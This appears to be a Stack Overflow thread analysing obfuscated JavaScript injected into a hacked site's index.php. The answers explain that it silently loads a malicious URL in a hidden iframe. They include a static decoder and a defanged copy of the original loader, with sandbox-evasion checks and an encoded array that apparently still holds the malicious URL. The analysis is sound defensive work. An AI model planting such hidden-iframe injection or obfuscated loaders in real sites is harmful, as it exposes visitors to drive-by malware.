 

Why this obfuscated code is malicious in JavaScript?

A friend of mine's site was being listed as malicious, and we found some obfuscated code that had been injected into his index.php without him knowing. I deobfuscated the code down two levels and found this:

(code can be viewed in the edit history)

Can anyone tell me what it's trying to do and why it's malicious..?

Nathan F. asked Nov 09 '12 17:11


2 Answers

To summarize, the code "decodes" HTML which places an <iframe> that loads in a malicious URL.

The following line has the "encoded" HTML:

n = ["9","9","45","42", ...

Each number represents a character that is in base-25. The code will loop through this array and use JavaScript's String.fromCharCode() to convert it to an ASCII character. After all of this, it will eval() it to place it on the page.

The "decoded" javascript is:

if (document.getElementsByTagName('body')[0]) {
    // <body> already exists: inject through the DOM
    iframer();
} else {
    // script ran before <body> was parsed: inject with document.write
    document.write("<iframe src='[stripped]' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', '[stripped]');
    // 10x10, invisible, pinned to the top-left corner so the visitor sees nothing
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

Note, I have stripped the malicious URL from the code for safety purposes.

newfurniturey answered Oct 13 '22 18:10
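As an added example (not code from the question or from either answer), here is a static decoder for the scheme newfurniturey describes: it turns the base-25 character-code array back into text and lists the iframes the result would inject, without ever calling eval(). The function names, the placeholder URL http://example.invalid/x and the sample payload are my own constructions; the two short fragments labelled as copied from the page are taken from the n=[...] array in the second answer and decode to "if (" and "document".

```javascript
// Added example, not code from the original question or answers.
// Statically decodes the base-25 character-code array described above and
// lists the iframes the payload would inject, without ever calling eval().

// Each array entry is a base-25 integer (digits 0-9, a-o) for one char code.
function decodeBase25(entries) {
  let out = "";
  for (const entry of entries) {
    const digits = String(entry).trim();
    if (!/^[0-9a-o]+$/i.test(digits)) {
      throw new Error(`not a base-25 number: ${JSON.stringify(entry)}`);
    }
    out += String.fromCharCode(parseInt(digits, 25));
  }
  return out;
}

// Inverse of the above; used only to build the constructed sample below.
function encodeBase25(text) {
  return Array.from(text, (ch) => ch.charCodeAt(0).toString(25));
}

// Triage the decoded script for injected iframes: both the document.write()
// markup variant and the createElement()/setAttribute() DOM variant.
function findIframes(decodedJs) {
  const found = [];
  for (const [tag] of decodedJs.matchAll(/<iframe\b[^>]*>/gi)) {
    const src = /\bsrc=['"]([^'"]*)['"]/i.exec(tag);
    found.push({
      src: src ? src[1] : null,
      hidden: /visibility\s*:\s*hidden/i.test(tag),
    });
  }
  const setSrc = /setAttribute\(\s*['"]src['"]\s*,\s*['"]([^'"]*)['"]\s*\)/gi;
  for (const m of decodedJs.matchAll(setSrc)) {
    found.push({
      src: m[1],
      hidden: /\.visibility\s*=\s*['"]hidden['"]/i.test(decodedJs),
    });
  }
  return found;
}

// Constructed sample (assumption: mirrors the shape of the decoded payload,
// with a placeholder URL in place of the real malicious one).
const SAMPLE_PAYLOAD =
  "if (document.getElementsByTagName('body')[0]){iframer();} else {" +
  "document.write(\"<iframe src='http://example.invalid/x' width='10' height='10' " +
  "style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>\");}" +
  "function iframer(){var f=document.createElement('iframe');" +
  "f.setAttribute('src','http://example.invalid/x');f.style.visibility='hidden';" +
  "document.getElementsByTagName('body')[0].appendChild(f);}";
const SAMPLE_ARRAY = encodeBase25(SAMPLE_PAYLOAD);

// Fragments copied from the n=[...] array in the second answer, to show the
// scheme matches: these decode to "if (" and "document".
const PAGE_FRAGMENT_IF = ["45", "42", "17", "1f"];
const PAGE_FRAGMENT_DOCUMENT = ["40", "4b", "3o", "4h", "49", "41", "4a", "4g"];

if (typeof require !== "undefined" && require.main === module) {
  console.log(decodeBase25(PAGE_FRAGMENT_IF), decodeBase25(PAGE_FRAGMENT_DOCUMENT));
  console.log(findIframes(decodeBase25(SAMPLE_ARRAY)));
}
```

To triage a real sample, paste its n=[...] array into decodeBase25() and read the output; the decoder rejects anything that is not a clean base-25 digit string, so a damaged or tampered entry fails loudly instead of silently producing a control character.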


It injects a hidden iframe into the page, linked to what may well be a dodgy site. Here's a safe version of the code you can run and see what it tries to inject...

http://jsfiddle.net/FqtZ8/

I visited the site it links to and chrome warned me of malware, so I went no further.

try{
  // Gate 1: in a real browser document.body can only be set to a <body> or
  // <frameset> element, so assigning a string throws and control moves into
  // the catch block. An emulator that lets the assignment succeed never decodes.
  if(window.document) window["document"]["body"]="123"
}catch(bawetawe){
  if(window.document){
    v=window;
    try{
      fawbe--   // gate 2: undeclared name, expected to throw ReferenceError
    }catch(afnwenew){
      try{
        (v+v)()   // gate 3: calling a string, expected to throw TypeError
      }catch(gngrthn){
        // Gate 4: 020 is legacy octal 16 in sloppy-mode JS, so the body
        // assignment runs and throws again. Strict-mode parsers reject 020
        // outright, so the script only runs where the author expected it to.
        try{if(020===0x10)v["document"]["body"]="123"
        }catch(gfdnfdgber){
          m=123;   // decoding below is enabled only after every gate threw
          // take the real eval only if alert has not been replaced by an analysis hook
          if((alert+"").indexOf("na"+"ti"+"ve")!==-1)ev=window["eval"];
        }
      }
n=            ["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","    j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1g","4n","d","9","9","9","45","42","4e","3m","49","41","4e","1f","1g","29","d","9","9","50","17","41","48","4f","41","17","4n","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","4j","4e","45","4g","41","1f","19","2a","45","42","4e","3m","49","41","17","4f","4e","3o","2b","1e","44","4g","4g","4c","28","1m","1m","43","3o","4d","40","4f","47","3m","4j","4f","4k","1l","41","40","4a","4f","1l","3n","45","4m","1m","4g","1m","4i","3o","1l","4c","44","4c","2d","43","4b","2b","20","1e","17","4j","45","40","4g","44","2b","1e","1o","1n","1e","17","44","41","45","43","44","4g","2b","1e","1o","1n","1e","17","4f","4g","4l","48","41","2b","1e","4i","45","4f","45","3n","45","48","45","4g","4l","28","44","45","40","40","41","4a","29","4c","4b","4f","45","4g","45","4b","4a","28","3m","3n","4f","4b","48","4h","4g","41","29","48","41","42","4g","28","1n","29","4g","4b","4c","28","1n","29","1e","2c","2a","1m","45","42","4e","3m","49","41","2c","19","1g","29","d","9","9","50","d","9","9","42","4h","4a","3o","4g","45","4b","4a","17","45","42","4e","3m","49","41","4e","1f","1g","4n","d","9","9","9","4i","3m","4e","17","42","17","2b","17","40","4b","3o","4h","49","41","4a","4g","1l","3o","4e","41","3m","4g","41","2j","48","41","49","41","4a","4g","1f","1e","45","42","4e","3m","49","41","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4f","4e","3o","1e","1j","1e","44","4g","4g","4c","28","1m","1m","43","3o","4d","40","4f","47","3m","4j","4f","4k","1l","41","40","4a","4f","1l","3n","45","4m","1m","4g","1m","4i","3o","1l","4c","44","4c","2d","43","4b","2b","20","1e","1g","29","42","1l","4f","4g","4l","48","41","1l","4i","45","4f","45","3n","45","48","45","4g","4l","2b","1e","44","45","40","40",
"41","4a","1e","29","42","1l","4f","4g","4l","48","41","1l","4c","4b","4f","45","4g","45","4b","4a","2b","1e","3m","3n","4f","4b","48","4h","4g","41","1e","29","42","1l","4f","4g","4l","48","41","1l","48","41","42","4g","2b","1e","1n","1e","29","42","1l","4f","4g","4l","48","41","1l","4g","4b","4c","2b","1e","1n","1e","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4j","45","40","4g","44","1e","1j","1e","1o","1n","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];
      h=2;   // h and k are never read; padding
      s="";
      // Decode: each entry of n is a base-25 integer holding one character code.
      // parseInt() strips leading whitespace, so the damaged "    j" entry above
      // decodes to char code 19; the intended entry is "2j", the 'E' in
      // "getElementsByTagName". i-589!=0 is just i!=589, and "fromCharCode" is
      // spliced from fragments so the method name never appears literally.
      if(m) for(i=0;i-589!=0;i++){
        k=i;
        if(window["document"]) s+=String["fro"+"mC"+"harCode"](
          parseInt(n[i],25)
        );
      }
      z=s;
      // Defanged: ev (eval) is assigned above but never called; the decoded
      // payload is displayed with alert() instead of being executed.
      alert(z);
    }
  }
}
Reinstate Monica Cellio answered Oct 13 '22 16:10